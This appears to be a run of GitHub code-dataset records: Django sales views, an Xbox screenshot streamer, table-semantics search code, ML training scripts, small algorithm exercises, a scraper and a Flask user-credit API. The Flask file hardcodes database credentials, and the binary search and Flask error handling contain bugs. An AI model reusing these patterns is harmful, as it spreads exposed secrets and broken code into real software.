Sale.objects.filter(type=\"normal\").values('quantity').annotate(amount=Sum('id', field=\"width * height\")\n # total_sales = Sale.objects.all().extra(select={'total': \"quantity * selling_price\"}).values\n total_sales = Sale.objects.filter().aggregate(sum=Sum(F('quantity')*F('selling_price')))[\"sum\"]\n \n context = {\n 'object_list' : Sale.objects.all(),\n 'total' : total_sales\n }\n return render(request, 'sales.html', context)\n\n\ndef Add(request):\n form = create_form(request.POST or None)\n\n if form.is_valid():\n obj = form.save(commit=False)\n\n # selling_price = obj.product.selling_price\n\n # if selling_price == None:\n # messages.error(request, 'Selling Price is missing !')\n # return HttpResponseRedirect(reverse('sales:home'))\n \n # obj.selling_price = selling_price\n \n if obj.product.quantity > obj.quantity:\n obj.balance = obj.product.quantity - obj.quantity\n obj.save()\n messages.error(request, 'Your actions have been succesfully saved !')\n else:\n messages.error(request, 'The quantity you are requesting for isn\\'t available !')\n\n\n return HttpResponseRedirect(reverse('sales:home'))\n\n \n return render(request, 'sales-add.html', {'form': form})\n\n\n@allowed_users(allowed_roles=['Administrator'])\ndef Edit(request, pk):\n object = Sale.objects.get(id=pk)\n form = create_form(request.POST or None, instance=object)\n\n if form.is_valid():\n form.save()\n request.session['message'] = True\n messages.error(request, 'Your actions have been succesfully saved !')\n return HttpResponseRedirect(reverse('sales:home'))\n \n return render(request, 'sales-edit.html', {'form': form})\n\n\n@allowed_users(allowed_roles=['Administrator'])\ndef Delete(request):\n pk = request.POST['product']\n object = Sale.objects.get(id=pk)\n object.delete()\n messages.error(request, 'Your actions have been succesfully saved !')\n return HttpResponseRedirect(reverse('sales:home'))\n\n","repo_name":"muhacodes/Depo","sub_path":"Sales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18944667947","text":"import requests\r\nimport pygame\r\nimport os\r\nfrom PIL import Image\r\nfrom time import sleep\r\nip = input(\"please enter your xbox one ip \\n\")\r\npygame.init()\r\n(width, height) = (1920, 1080)\r\nscreen = pygame.display.set_mode((width, height))\r\nwhile True:\r\n image = requests.get('https://'+ ip +':11443/ext/screenshot?download=true', verify=False)\r\n file= open(\"i.png\",'wb')\r\n file.write(image.content)\r\n im = Image.open(\"i.png\")\r\n rgb_im = im.convert('RGB')\r\n rgb_im.save('j.jpg')\r\n bg = pygame.image.load(\"j.jpg\")\r\n screen.blit(bg,(0,0))\r\n pygame.display.update()\r\n","repo_name":"tunip3/shitty-stream-for-xbox-one","sub_path":"shittystream.py","file_name":"shittystream.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"24260016556","text":"# -*- coding: utf-8 -*-\n\n\n#from tkinter import E\nimport numpy as np\nimport pandas as pd\nimport csv\nimport glob\nimport time\nimport os.path\nfrom pathlib import Path\nimport sys\nimport re \n# from nltk.corpus import stopwords\n# from nltk import word_tokenize, pos_tag\n\n\n#This function takes a column and determines whether it is text or numeric column\n#This has been done using a well-known information retrieval technique\n#Check each cell to see if it is text. Then if enough number of cells are \n#text, the column is considered as a text column.\ndef getColumnType(attribute, column_threshold=.5, entity_threshold=.5):\n attribute = [item for item in attribute if str(item) != \"nan\"]\n if len(attribute) == 0:\n return 0\n strAttribute = [item for item in attribute if type(item) == str]\n strAtt = [item for item in strAttribute if not item.isdigit()]\n for i in range(len(strAtt)-1, -1, -1):\n entity = strAtt[i]\n num_count = 0\n for char in entity:\n if char.isdigit():\n num_count += 1\n if num_count/len(entity) > entity_threshold:\n del strAtt[i] \n if len(strAtt)/len(attribute) > column_threshold:\n return 1\n else:\n return 0\n \n#removes punctuations and whitespaces from string. The same preprocessing\n#is done in yago label file\ndef preprocessString(string):\n string = re.sub(r'[^\\w]', ' ', string)\n string = string.replace(\"nbsp\",'')\n string =\" \".join(string.split())\n return (string)\n\n#removes punctuations and whitespaces from list items\ndef preprocessListValues(valueList):\n valueList = [x.lower() for x in valueList if checkIfNullString(x) !=0]\n valueList = [re.sub(r'[^\\w]', ' ', string) for string in valueList]\n valueList = [x.replace('nbsp','') for x in valueList ] #remove html whitespace\n valueList = [\" \".join(x.split()) for x in valueList]\n return valueList\n\n#checks different types of nulls in string\ndef checkIfNullString(string):\n nullList = ['nan','-','unknown','other (unknown)','null','na', \"\", \" \"]\n if str(string).lower() not in nullList:\n return 1\n else:\n return 0\n \n#remove hyphen and whitespaces from the table name\ndef cleanTableName(string):\n tableName = string.replace(\"-\",\"\")\n tableName = ' '.join(tableName.split(\"_\"))\n tableName = '_'.join(tableName.split())\n return tableName\n\n#needed if direct hit is not found in the KB\ndef extractNouns(stringList):\n sentence = ' '.join(item for item in stringList)\n nouns = [token for token, pos in pos_tag(word_tokenize(sentence)) if pos.startswith('N')]\n return nouns\n\n#extracts tokens from the cell value or value list\ndef expandQuery(stringList):\n stringList = [item for item in stringList if type(item) == str]\n stringList = preprocessListValues(stringList)\n nounList = extractNouns(stringList)\n expandedQueryList = [words for segments in nounList for words in segments.split()]\n # handle phrase queries\n removeNouns = []\n for entity in expandedQueryList:\n entityList = entity.split(\" \")\n if entityList.count('') > 0 and entityList.count('') <= 2:\n entityList.remove('')\n index = 0\n while index <= len(entityList) - 1:\n word = entityList[index]\n if word in nounList:\n if index + 1 < len(entityList):\n nextWord = entityList[index + 1]\n if entityList[index + 1] in nounList:\n removeNouns.append(word)\n removeNouns.append(entityList[index + 1])\n expandedQueryList.append(word + \" \" + entityList[index + 1])\n index += 1\n index += 1\n \n finalNouns = [noun for noun in expandedQueryList if noun not in removeNouns]\n stopWordsRemovedList= [word for word in finalNouns if word.lower() not in stopwords.words('english')]\n return (list(set(stopWordsRemovedList)))\n\n\ndef getMatchingTables(item, weight, parameter): \n returnList = []\n #print(merge)\n for each in item:\n temp = each\n tableName = temp[0]\n #tableName = cleanTableName(temp[0])\n tableScore = temp[-1] * weight *parameter\n returnList.append((tableName, tableScore))\n return returnList\n\n\n#compute synthesized CS for the query table\ndef computeSynthColumnSemantics(input_table, synth_type_kb):\n #synthInvertedIndex = {}\n all_column_semantics = {}\n col_id = 0\n for (columnName, columnData) in input_table.iteritems():\n sem = {}\n #creating the lookup table for data lake tables\n if getColumnType(input_table[columnName].tolist()) == 1:\n #print(table_name)\n input_table[columnName] = input_table[columnName].map(str)\n valueList = preprocessListValues(input_table[columnName].unique()) \n hit_found = 0 \n #find bag of semantics for each column\n for value in valueList:\n if value in synth_type_kb:\n item = synth_type_kb[value]\n hit_found += 1\n for temp in item:\n semName = temp[0]\n semScore = temp[-1] \n if semName in sem:\n sem[semName] +=semScore\n else:\n sem[semName] = semScore\n for every in sem:\n sem[every] = sem[every]/hit_found\n\n if str(col_id) in all_column_semantics:\n print(\"red flag!!!\")\n else:\n all_column_semantics[str(col_id)] = sem\n col_id += 1\n return all_column_semantics\n\n#compute synthesized relationship semantics for the query table\ndef computeSynthRelation(inputTable, subjectIndex, synthKB):\n label = \"r\"\n synth_triple_dict = {}\n total_cols = inputTable.shape[1]\n subject_semantics = set()\n for i in range(0, total_cols -1): \n if getColumnType(inputTable.iloc[:,i].tolist()) == 1: #the subject in rdf triple should be a text column\n for j in range(i+1, total_cols):\n if getColumnType(inputTable.iloc[:,j].tolist()) == 1: #the subject in rdf triple should be a text column\n mergeRelSem = {}\n dataFrameTemp = inputTable.iloc[:,[i,j]]\n dataFrameTemp = (dataFrameTemp.drop_duplicates()).dropna()\n projectedRowsNum = dataFrameTemp.shape[0]\n \n #find relation semantics for each value pairs of subjectIndex and j\n for k in range(0,projectedRowsNum):\n #extract subject and object\n sub = preprocessString(str(dataFrameTemp.iloc[k][0]).lower())\n obj = preprocessString(str(dataFrameTemp.iloc[k][1]).lower())\n subNull = checkIfNullString(sub)\n objNull = checkIfNullString(obj)\n if subNull != 0 and objNull != 0:\n item = []\n value = sub+\"__\"+obj\n if value in synthKB:\n item = synthKB[value]\n \n else:\n value = obj+\"__\"+sub\n if value in synthKB:\n item = synthKB[value]\n \n if len(item) > 0 :\n for each in item:\n temp = each\n if temp[-1] >0:\n semName = temp[0]\n semScore = temp[-1] \n if semName in mergeRelSem:\n mergeRelSem[semName] +=semScore/projectedRowsNum\n else:\n mergeRelSem[semName] = semScore/projectedRowsNum\n \n\n triple_list = []\n for sem in mergeRelSem:\n triple_list.append((sem, mergeRelSem[sem]))\n \n synth_triple_dict[str(i) + \"-\" + str(j)] = triple_list\n if int(subjectIndex) == i or int(subjectIndex) == j:\n for sem in mergeRelSem:\n subject_semantics.add(sem)\n return synth_triple_dict, subject_semantics\n \n#compute KB RS for the query table\ndef computeRelationSemantics(input_table, tab_id, LABEL_DICT, FACT_DICT):\n total_cols = input_table.shape[1]\n relation_dependencies = []\n entities_finding_relation = {}\n relation_dictionary = {}\n #compute relation semantics\n for i in range(0, total_cols-1):\n #print(\"i=\",i)\n if getColumnType(input_table.iloc[:, i].tolist()) == 1: \n #the subject in rdf triple should be a text column\n for j in range(i+1, total_cols):\n semantic_dict_forward = {}\n semantic_dict_backward = {}\n column_pairs = input_table.iloc[:, [i, j]]\n column_pairs = (column_pairs.drop_duplicates()).dropna()\n unique_rows_in_pair = column_pairs.shape[0]\n total_kb_forward_hits = 0\n total_kb_backward_hits = 0\n for k in range(0, unique_rows_in_pair):\n #extract subject and object\n subject_value = preprocessString(str(column_pairs.iloc[k][0]).lower())\n object_value = preprocessString(str(column_pairs.iloc[k][1]).lower())\n is_sub_null = checkIfNullString(subject_value)\n is_obj_null = checkIfNullString(object_value)\n if is_sub_null != 0:\n sub_entities = LABEL_DICT.get(subject_value, \"None\")\n if sub_entities != \"None\":\n if is_obj_null != 0: \n obj_entities = LABEL_DICT.get(object_value, \"None\")\n if obj_entities != \"None\":\n #As both are not null, search for relation semantics\n for sub_entity in sub_entities:\n for obj_entity in obj_entities:\n #preparing key to search in the fact file\n entity_forward = sub_entity + \"__\" + obj_entity\n entity_backward = obj_entity + \"__\" + sub_entity\n relation_forward = FACT_DICT.get(entity_forward, \"None\")\n relation_backward = FACT_DICT.get(entity_backward, \"None\")\n if relation_forward != \"None\":\n total_kb_forward_hits += 1\n #keep track of the entity finding relation. We will use this to speed up the column semantics search\n key = str(i)+\"_\"+subject_value\n if key not in entities_finding_relation:\n entities_finding_relation[key] = {sub_entity}\n else:\n entities_finding_relation[key].add(sub_entity)\n key = str(j) + \"_\" + object_value\n if key not in entities_finding_relation:\n entities_finding_relation[key] = {obj_entity}\n else:\n entities_finding_relation[key].add(obj_entity)\n for s in relation_forward:\n if s in semantic_dict_forward:\n semantic_dict_forward[s] += 1 #relation semantics in forward direction\n else:\n semantic_dict_forward[s] = 1\n if relation_backward != \"None\":\n total_kb_backward_hits += 1\n #keep track of the entity finding relation. We will use this for column semantics search\n key = str(i)+\"_\"+subject_value\n if key not in entities_finding_relation:\n entities_finding_relation[key] = {sub_entity}\n else:\n entities_finding_relation[key].add(sub_entity)\n \n key = str(j)+\"_\"+object_value\n if key not in entities_finding_relation:\n entities_finding_relation[key] = {obj_entity}\n else:\n entities_finding_relation[key].add(obj_entity)\n \n for s in relation_backward:\n if s in semantic_dict_backward:\n semantic_dict_backward[s] += 1 #relation semantics in reverse direction\n else:\n semantic_dict_backward[s] = 1\n if len(semantic_dict_forward) > 0:\n relation_dependencies.append(str(i)+\"-\"+str(j))\n relation_dictionary[str(i)+\"-\"+str(j)] = [(max(semantic_dict_forward, key=semantic_dict_forward.get), max(semantic_dict_forward.values())/ total_kb_forward_hits)]\n if len(semantic_dict_backward) >0:\n relation_dependencies.append(str(j)+\"-\"+str(i))\n relation_dictionary[str(j)+\"-\"+str(i)] = [(max(semantic_dict_backward, key=semantic_dict_backward.get), max(semantic_dict_backward.values())/ total_kb_backward_hits)]\n return entities_finding_relation, relation_dependencies, relation_dictionary\n\n#yago column semantics for query table\ndef computeColumnSemantics(input_table, subject_index, LABEL_DICT, TYPE_DICT, CLASS_DICT, RELATION_DICT):\n col_id = 0\n not_found_in_yago = []\n column_dictionary = {}\n subject_semantics = \"\"\n for (columnName, columnData) in input_table.iteritems():\n if getColumnType(input_table[columnName].tolist()) == 1: #check column Type\n input_table[columnName] = input_table[columnName].map(str) \n #get unique values in the column and preprocess them.\n value_list = preprocessListValues(input_table[columnName].unique())\n #search values in KB \n all_found_types = {}\n total_kb_hits = 0\n if str(subject_index) == str(col_id):\n label = \"sc\"\n else:\n label = \"c\"\n for value in value_list:\n current_entities = set()\n current_types = set()\n current_entities = RELATION_DICT.get(str(col_id) + \"_\"+ value, \"None\")\n #print(current_entities)\n if current_entities != \"None\":\n total_kb_hits += 1\n for entity in current_entities:\n if entity in TYPE_DICT:\n temp_type = TYPE_DICT[entity]\n for entity_type in temp_type:\n current_types.add(entity_type)\n for each_type in current_types:\n if each_type in all_found_types:\n all_found_types[each_type] +=1\n else:\n all_found_types[each_type] = 1 \n else: \n current_entities = LABEL_DICT.get(value, \"None\")\n if current_entities != \"None\": #found in KB\n total_kb_hits += 1\n for entity in current_entities:\n if entity in TYPE_DICT:\n temp_type = TYPE_DICT[entity]\n for entity_type in temp_type:\n current_types.add(entity_type)\n for each_type in current_types:\n if each_type in all_found_types:\n all_found_types[each_type] +=1\n else:\n all_found_types[each_type] = 1 \n \n #find the top-level type with highest count.\n all_top_types = [v for v in sorted(all_found_types.items(), key=lambda kv: (-kv[1], kv[0])) if v[0] in CLASS_DICT]\n if all_top_types:\n selected_top_type = all_top_types[0][0]\n top_type_count = all_top_types[0][1]\n if label == \"sc\":\n subject_semantics = selected_top_type\n children_of_top_types = CLASS_DICT[selected_top_type]\n #add children of top types to the bag of word\n for each in all_found_types:\n if each in children_of_top_types and (all_found_types[each] / top_type_count) >= 0:\n if int(col_id) not in column_dictionary:\n column_dictionary[int(col_id)] = [(each, all_found_types[each]/total_kb_hits)]\n else:\n column_dictionary[int(col_id)].append((each, all_found_types[each]/total_kb_hits))\n col_id += 1\n \n return column_dictionary, subject_semantics\n\n\n","repo_name":"northeastern-datalab/dialite","sub_path":"santos/codes/santos.py","file_name":"santos.py","file_ext":"py","file_size_in_byte":18546,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9957633564","text":"import glob\nimport os\n\nimport jieba\n\n\n# 对弹幕进行分词操作\ndef bullet_screen_separate():\n # 读取要分析的文本\n bullet_screen_dir = \"../data/weekly_list/\"\n txt_files = glob.glob(os.path.join(bullet_screen_dir, '*combined_strings.txt'))\n\n for txt_file in txt_files:\n with open(txt_file, 'r', encoding=\"utf8\") as file:\n content = file.read()\n seg_list = jieba.cut(content)\n seg_list = [word for word in seg_list if len(word) > 1]\n\n year = txt_file.split('_combined')[0]\n separate_dir = f\"{year}_separate.txt\"\n\n # 将分词结果写入文件\n with open(file=separate_dir, mode=\"w\", encoding=\"utf-8\") as f:\n f.write(\" \".join(seg_list))\n\n\nbullet_screen_separate()\n","repo_name":"Jakesoso/bilibili_analysis","sub_path":"bilibili_data_graph/wordcloud/separate_bullet_screen.py","file_name":"separate_bullet_screen.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"594959340","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms\n\nfrom torchsummary import summary\nfrom tqdm.auto import tqdm\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure\nimport pandas as pd\nimport time\nfrom ptflops import get_model_complexity_info\n\nfrom mobilenet_model import *\n\nBATCH_SIZE = 1024\nNUM_EPOCH = 10\nLEARNING_RATE = 1e-3\nCRITERION = nn.CrossEntropyLoss()\n\n\n# %%\n# CIFAR100 Dataset\ntrain_dataset = dsets.CIFAR100(root='./data', train=True, \n transform=transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ]), download=True)\ntest_dataset = dsets.CIFAR100(root='./data', train=False,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ]))\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=BATCH_SIZE, shuffle=True)\ntest_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=BATCH_SIZE, shuffle=False)\n\n\n# %%\n# Assign model and optimizer\n\ntorch.cuda.empty_cache()\nres = torch.hub.load('pytorch/vision:v0.6.0', 'resnet50', pretrained=False).cuda()\nires = MobileNetV2(num_classes=100).cuda()\n\n# model, losses, train_acc = fit(plainnet_model, train_loader)\noptimizer1 = torch.optim.Adam(res.parameters(), lr=LEARNING_RATE, weight_decay=1e-4)\noptimizer2 = torch.optim.Adam(ires.parameters(), lr=LEARNING_RATE, weight_decay=1e-4)\ndevice = 'cuda:0'\n\nr_loss, r_acc = [], []\ni_loss, i_acc = [], []\n\n# %%\n# Plot information\n\nwith torch.cuda.device(0):\n macs, params = get_model_complexity_info(res, (3, 32, 32), as_strings=True, verbose=False)\n print('{:<30} {:<8}'.format('Computational complexity: ', macs))\n print('{:<30} {:<8}'.format('Number of parameters: ', params))\n\n macs, params = get_model_complexity_info(ires, (3, 32, 32), as_strings=True, verbose=False)\n print('{:<30} {:<8}'.format('Computational complexity: ', macs))\n print('{:<30} {:<8}'.format('Number of parameters: ', params))\n\n# %%\n# Training Resnet50\n \nfor epoch in range(NUM_EPOCH):\n start = time.time()\n res.train()\n losses = 0.0\n for i, data in enumerate(train_loader):\n image = data[0].cuda(device)\n label = data[1].cuda(device)\n torch.cuda.synchronize()\n start_f = time.time()\n pred_label = res(image)\n torch.cuda.synchronize()\n estimate_f = time.time() - start_f\n if i == 0 and epoch == 0:\n print(f\"forward path : {estimate_f} sec\")\n loss = CRITERION(pred_label, label)\n losses += loss.item()\n\n optimizer1.zero_grad()\n torch.cuda.synchronize()\n start_b = time.time()\n loss.backward()\n torch.cuda.synchronize()\n estimate_b = time.time() - start_b\n if i == 0 and epoch == 0:\n print(f\"backward path : {estimate_b} sec\")\n optimizer1.step()\n avg_loss = losses/len(train_loader)\n r_loss.append(avg_loss)\n\n\n res.eval()\n pred_labels = []\n real_labels = []\n\n for i, data in enumerate(test_loader):\n image = data[0].cuda(device)\n label = data[1].cuda(device)\n real_labels += list(label.cpu().detach().numpy())\n \n pred_label = res(image)\n pred_label = list(pred_label.cpu().detach().numpy())\n pred_labels += pred_label\n \n real_labels = np.array(real_labels)\n pred_labels = np.array(pred_labels)\n pred_labels = pred_labels.argmax(axis=1)\n acc = sum(real_labels==pred_labels)/len(real_labels)*100\n r_acc.append(acc)\n\n if epoch % 5 == 0:\n print(f\"[{epoch}/{NUM_EPOCH}] : {r_loss[epoch]}\")\n \n if epoch == 0:\n estimate = (time.time() - start) * NUM_EPOCH\n print(f\"Estimated total = {estimate // 60} min {estimate % 60} sec\")\n\n# %%\n# Training MobileNetV2\n\nfor epoch in range(NUM_EPOCH):\n\n ires.train()\n losses = 0.0\n for i, data in enumerate(train_loader):\n image = data[0].cuda(device)\n label = data[1].cuda(device)\n torch.cuda.synchronize()\n start_f2 = time.time()\n pred_label = ires(image)\n torch.cuda.synchronize()\n estimate_f2 = time.time() - start_f2\n if i == 0 and epoch == 0:\n print(f\"forward path : {estimate_f2} sec\")\n loss = CRITERION(pred_label, label)\n losses += loss.item()\n\n optimizer2.zero_grad()\n torch.cuda.synchronize()\n start_b = time.time()\n loss.backward()\n torch.cuda.synchronize()\n estimate_b = time.time() - start_b\n if i == 0 and epoch == 0:\n print(f\"backward path : {estimate_b} sec\")\n optimizer2.step()\n avg_loss = losses/len(train_loader)\n i_loss.append(avg_loss)\n\n\n ires.eval()\n pred_labels = []\n real_labels = []\n\n for i, data in enumerate(test_loader):\n image = data[0].cuda(device)\n label = data[1].cuda(device)\n real_labels += list(label.cpu().detach().numpy())\n \n pred_label = ires(image)\n pred_label = list(pred_label.cpu().detach().numpy())\n pred_labels += pred_label\n \n real_labels = np.array(real_labels)\n pred_labels = np.array(pred_labels)\n pred_labels = pred_labels.argmax(axis=1)\n acc = sum(real_labels==pred_labels)/len(real_labels)*100\n i_acc.append(acc)\n \n if epoch % 5 == 0:\n print(f\"[{epoch}/{NUM_EPOCH}] : {i_loss[epoch]}\")\n\n# %%\n# Plot graph\n\nfigure(num=None, figsize=(14, 6), dpi=80, facecolor='w', edgecolor='k')\nplt.subplot(121)\nline1, = plt.plot(r_loss)\nline2, = plt.plot(i_loss)\nplt.legend(labels=(\"Residual\", \"Inverted\"))\nplt.grid()\n\n\nplt.subplot(122)\nline1, = plt.plot(r_acc)\nline2, = plt.plot(i_acc)\nplt.legend(labels=(\"Residual\", \"Inverted\"))\nplt.grid()\nplt.show()\n\n\n","repo_name":"SteveJayH/AI502_Midterm_Project","sub_path":"mobilenet_resnet.py","file_name":"mobilenet_resnet.py","file_ext":"py","file_size_in_byte":6336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23882972600","text":"from os import *\nfrom sys import *\nfrom collections import *\nfrom math import *\n\nfrom sys import stdin, setrecursionlimit\nfrom queue import Queue\nsetrecursionlimit(10**7)\n\n\n# Binary tree node class for reference\nclass BinaryTreeNode:\n def __init__(self, data):\n self.val = data\n self.left = None\n self.right = None\n\n# ----------------------\ndef getLevelOrder(root):\n \n # Approach: BFS traversal of Tree\n # Time Complexity: O(N)\n # Space Complexity: O(N)\n traversal = []\n queue = [root]\n \n def levelorder_traversal(node):\n while(queue): # Until queue not empty\n # 1. Pop element in front\n curr_node = queue.pop(0) \n # 2. Append to Traversal\n traversal.append(curr_node.val)\n # 3. Push left node\n if curr_node.left:\n queue.append(curr_node.left)\n # 4. Push Right node\n if curr_node.right:\n queue.append(curr_node.right)\n \n # If tree exists\n if root:\n levelorder_traversal(root)\n \n return traversal\n# ----------------------\n\n# Fast input\ndef takeInput():\n\n arr = list(map(int, stdin.readline().strip().split(\" \")))\n\n rootData = arr[0]\n\n n = len(arr)\n\n if(rootData == -1):\n return None\n\n root = BinaryTreeNode(rootData)\n q = Queue()\n q.put(root)\n index = 1\n while(q.qsize() > 0):\n currentNode = q.get()\n\n leftChild = arr[index]\n\n if(leftChild != -1):\n leftNode = BinaryTreeNode(leftChild)\n currentNode.left = leftNode\n q.put(leftNode)\n\n index += 1\n rightChild = arr[index]\n\n if(rightChild != -1):\n rightNode = BinaryTreeNode(rightChild)\n currentNode .right = rightNode\n q.put(rightNode)\n\n index += 1\n\n return root\n\n\ndef printAns(ans):\n for x in ans:\n print(x, end=\" \")\n print()\n\n\n# main\nT = int(stdin.readline().strip())\nfor i in range(T):\n root = takeInput()\n ans = getLevelOrder(root)\n printAns(ans)\n","repo_name":"sanafathima418/StriverSDESheet","sub_path":"Trees/level_order_traversal.py","file_name":"level_order_traversal.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2566898850","text":"from urllib.request import urlopen\r\nfrom bs4 import BeautifulSoup\r\n\r\nurl = \"http://abbaflix.com/frah\"\r\nhtml = urlopen(url).read()\r\nsoup = BeautifulSoup(html, features=\"html.parser\")\r\n\r\n# kill all script and style elements\r\nfor script in soup([\"script\", \"style\"]):\r\n script.extract() # rip it out\r\n\r\n# get text\r\ntext = soup.get_text()\r\n\r\n# break into lines and remove leading and trailing space on each\r\nlines = (line.strip() for line in text.splitlines())\r\n# break multi-headlines into a line each\r\nchunks = (phrase.strip() for line in lines for phrase in line.split(\" \"))\r\n# drop blank lines\r\ntext = '\\n'.join(chunk for chunk in chunks if chunk)\r\n\r\n#print(text)\r\n\r\n\r\nfile = open(\"text_file.txt\", \"w\")\r\nfile.write(text)\r\nfile.close\r\n\r\n# Open the file in read mode\r\ntext = open(\"text_file.txt\", \"r\")\r\n\r\n# Create an empty dictionary\r\nd = dict()\r\n\r\n# Loop through each line of the file\r\nfor line in text:\r\n\t# Remove the leading spaces and newline character\r\n\tline = line.strip()\r\n\r\n\t# Convert the characters in line to\r\n\t# lowercase to avoid case mismatch\r\n\tline = line.lower()\r\n\r\n\t# Split the line into words\r\n\twords = line.split(\" \")\r\n\r\n\t# Iterate over each word in line\r\n\tfor word in words:\r\n\t\t# Check if the word is already in dictionary\r\n\t\tif word in d:\r\n\t\t\t# Increment count of word by 1\r\n\t\t\td[word] = d[word] + 1\r\n\t\telse:\r\n\t\t\t# Add the word to dictionary with count 1\r\n\t\t\td[word] = 1\r\n\r\n# Print the contents of dictionary\r\nfor key in list(d.keys()):\r\n\tprint(key, \":\", d[key])\r\n","repo_name":"dennisntoiti/web-scrapper","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29678946124","text":"def binarySearch(arr,num,start,end):\n if start > end:\n return -1\n mid = start + (end-start)//2\n if arr[mid] == num:\n return mid\n elif end > mid:\n return binarysearch(arr, num, mid + 1, end)\n else:\n return binarysearch(arr, num, start, mid - 1)\n\nif __name__ == \"__main__\":\n n = int(input(\"Enter number of elements: \"))\n array=[]\n print(\"Enter the elements:\")\n for i in range(n):\n x = int(input(\"\"))\n array.append(x)\n num = int(input(\"Enter the element to search: \"))\n pos = binarySearch(array, num, 0, len(array)-1)\n if pos == -1:\n print(\"Element is not present in the array\")\n else:\n print(f\"Element found at position {pos} in the array\")\n\n \n","repo_name":"N0vice17/DSA-with-Java","sub_path":"Searching_Algorithm/PYTHON/BinarySearch_UsingRecursion.py","file_name":"BinarySearch_UsingRecursion.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"31111758596","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom sqlalchemy.exc import CompileError,DataError\n\n#Connect to the AWS RDS postgres instance\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql+psycopg2://User_database:12345678@userinstance.cacpqjasklix.us-east-1.rds.amazonaws.com:5432/User_database'\ndb = SQLAlchemy(app)\n\nfrom user import User\nimport util\nfrom flask import Response\nfrom functools import wraps\nimport json\nimport flask\nfrom util import response\nimport uuid\n\n#Create or update tables in the database\ndb.create_all()\n\ndef json_api(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n result = f(*args, **kwargs)\n json_result = util.to_json(result)\n return Response(response=json_result, status=200, mimetype=\"application/json\")\n\n return decorated_function\n\n@app.route(\"/\")\ndef hello():\n return \"Hello World!\"\n\n\n#Create a new user with unique email id\n@app.route(\"/users/create/\", methods=[\"POST\"])\n@json_api\ndef create_user():\n try:\n data = json.loads((flask.request.data).decode('utf-8'))\n user_1 = User(id=uuid.uuid4(),\n first_name=data[\"first_name\"],\n last_name=data[\"last_name\"],\n credit=data[\"credit\"],\n email=data[\"email\"])\n\n db.session.add(user_1)\n db.session.commit()\n return response(user_1.get_data(), True)\n except KeyError as e:\n if e.message == 'credit':\n user_1 = User(id=uuid.uuid4(),\n first_name = data[\"first_name\"],\n last_name = data[\"last_name\"],\n email = data[\"email\"])\n\n db.session.add(user_1)\n return response(user_1.get_data(), True)\n else:\n return response({\"message\": 'firstname, lastname, and email required'}, False)\n except DataError:\n return response({'message': 'User with email: %s already exists' % data[\"email\"]}, False)\n\n\n#Delete a user from the user table\n@app.route(\"/users/remove/\", methods=[\"DELETE\"])\n@json_api\ndef remove_user(user_id):\n try:\n obj = User.query.filter_by(id=user_id).one()\n db.session.delete(obj)\n db.session.commit()\n return response({'message': 'User removed successfully'}, True)\n except NoResultFound:\n return response({'message': 'User not found'}, False)\n except OperationalError:\n return response({'message': 'Operational Error !!!'}, False)\n\n\n#Find user from the user table\n@app.route(\"/users/find/\")\n@json_api\ndef find_user(user_id):\n try:\n user_1 = User.query.filter_by(id=user_id).one()\n return response(user_1.get_data(), True)\n except NoResultFound:\n return response({'message': 'User not found'}, False)\n except OperationalError as e:\n return response({'message': e}, False)\n\n\n#Find user credits\n@app.route(\"/users/credit/\")\n@json_api\ndef find_credit(user_id):\n try:\n user_1 = User.query.filter_by(id=user_id).one()\n return response(user_1.get_credit(), True)\n except NoResultFound:\n return response({'message': \"User's credit not found\"}, False)\n except OperationalError:\n return response({'message': 'Operational Error !!!'}, False)\n\n\n#Add money to user credits\n@app.route(\"/users/credit/add//\", methods=[\"POST\"])\n@json_api\ndef add_credit(user_id, amount):\n try:\n user_1 = User.query.filter_by(id=user_id).one()\n user_1.credit = user_1.credit + float(amount)\n db.session.commit()\n return response(user_1.get_credit(), True)\n except NoResultFound:\n return response({'message': 'User not found'}, False)\n except OperationalError:\n return response({'message': 'Operational Error !!!'}, False)\n\n\n#Subtract money from user credits\n@app.route(\"/users/credit/subtract//\", methods=[\"POST\"])\n@json_api\ndef subtract_credit(user_id, amount):\n try:\n user_1 = User.query.filter_by(id=user_id).one()\n curr_credit = user_1.credit\n if curr_credit - float(amount) < 0:\n return response({'message': 'Not enough money BITCH!!!!!'}, False)\n else:\n user_1.credit = curr_credit - float(amount)\n db.session.commit()\n return response(user_1.get_credit(), True)\n except NoResultFound:\n return response({'message': 'User not found'}, False)\n except ValueError as v_err:\n return response({'message': v_err.message}, False)\n except OperationalError:\n return response({'message': 'Operational Error !!!'}, 